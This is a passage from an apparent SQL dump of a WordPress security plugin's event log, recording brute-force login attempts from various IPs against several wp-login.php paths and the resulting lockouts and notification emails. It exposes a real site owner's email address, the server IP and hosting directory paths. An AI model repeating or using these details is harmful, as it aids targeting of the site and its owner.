19:06:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:06:15\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:21:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:21:15\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 11:06:17','2019-09-21 11:06:15',18396152,19613520,'https://bintara.com.my/test/xmlrpc.php',1,0,'178.62.9.122'),(25477,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:06:17','2019-09-21 11:06:15',18603816,19613520,'https://bintara.com.my/test/xmlrpc.php',1,0,'178.62.9.122'),(25478,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEZ1iJ7D9Gn7wDPh8WUwAAAMs\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.205.104\";s:11:\"REMOTE_PORT\";s:5:\"46539\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEZ1iJ7D9Gn7wDPh8WUwAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064041.2708\";s:12:\"REQUEST_TIME\";s:10:\"1569064041\";}}','notice','2019-09-21 11:07:22','2019-09-21 11:07:21',17803168,19288760,'https://bintara.com.my/2019/wp-login.php',1,0,'51.75.205.104'),(25479,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:07:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:07:21\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:22:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:22:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:07:22','2019-09-21 11:07:21',17887888,19288760,'https://bintara.com.my/2019/wp-login.php',1,0,'51.75.205.104'),(25480,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:07:22','2019-09-21 11:07:21',18093848,19288760,'https://bintara.com.my/2019/wp-login.php',1,0,'51.75.205.104'),(25481,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYElDDrcQxTmGrCWuaKNgAAAdM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"59639\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYElDDrcQxTmGrCWuaKNgAAAdM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064086.3073\";s:12:\"REQUEST_TIME\";s:10:\"1569064086\";}}','notice','2019-09-21 11:08:11','2019-09-21 11:08:10',17801176,19287168,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.165.250.134'),(25482,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:08:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:08:10\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:23:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:23:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:08:11','2019-09-21 11:08:10',17885592,19287168,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.165.250.134'),(25483,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:08:11','2019-09-21 11:08:10',18091384,19287168,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.165.250.134'),(25484,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEmHkXpgmG5P@iB8kSAgAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.185.255\";s:11:\"REMOTE_PORT\";s:5:\"58770\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEmHkXpgmG5P@iB8kSAgAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1569064090.1\";s:12:\"REQUEST_TIME\";s:10:\"1569064090\";}}','notice','2019-09-21 11:08:12','2019-09-21 11:08:11',17800992,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.185.255'),(25485,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:08:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:08:11\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:23:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:23:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:08:12','2019-09-21 11:08:11',17884784,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.185.255'),(25486,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:08:12','2019-09-21 11:08:11',18090496,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.185.255'),(25487,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEn7fBTP0kPOVnb8jp1wAAAEE\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:10:\"36.92.1.31\";s:11:\"REMOTE_PORT\";s:5:\"55820\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEn7fBTP0kPOVnb8jp1wAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064095.4945\";s:12:\"REQUEST_TIME\";s:10:\"1569064095\";}}','notice','2019-09-21 11:08:16','2019-09-21 11:08:15',17799200,19289368,'https://bintara.com.my/test/wp-login.php',1,0,'36.92.1.31'),(25488,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:08:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:08:15\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:23:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:23:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:08:16','2019-09-21 11:08:15',17884120,19289368,'https://bintara.com.my/test/wp-login.php',1,0,'36.92.1.31'),(25489,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:08:16','2019-09-21 11:08:15',18090232,19289368,'https://bintara.com.my/test/wp-login.php',1,0,'36.92.1.31'),(25490,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEuViJ7D9Gn7wDPh8WZQAAANc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"138.68.24.138\";s:11:\"REMOTE_PORT\";s:5:\"31642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEuViJ7D9Gn7wDPh8WZQAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064127.1354\";s:12:\"REQUEST_TIME\";s:10:\"1569064127\";}}','notice','2019-09-21 11:08:49','2019-09-21 11:08:47',17798296,19287928,'https://bintara.com.my/blog/wp-login.php',1,0,'138.68.24.138'),(25491,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:08:47\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:08:47\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:23:47\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:23:47\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:08:49','2019-09-21 11:08:47',17883184,19287928,'https://bintara.com.my/blog/wp-login.php',1,0,'138.68.24.138'),(25492,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:08:49','2019-09-21 11:08:47',18088656,19287928,'https://bintara.com.my/blog/wp-login.php',1,0,'138.68.24.138'),(25493,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEwliJ7D9Gn7wDPh8WagAAAMA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"5.196.118.54\";s:11:\"REMOTE_PORT\";s:5:\"34570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16: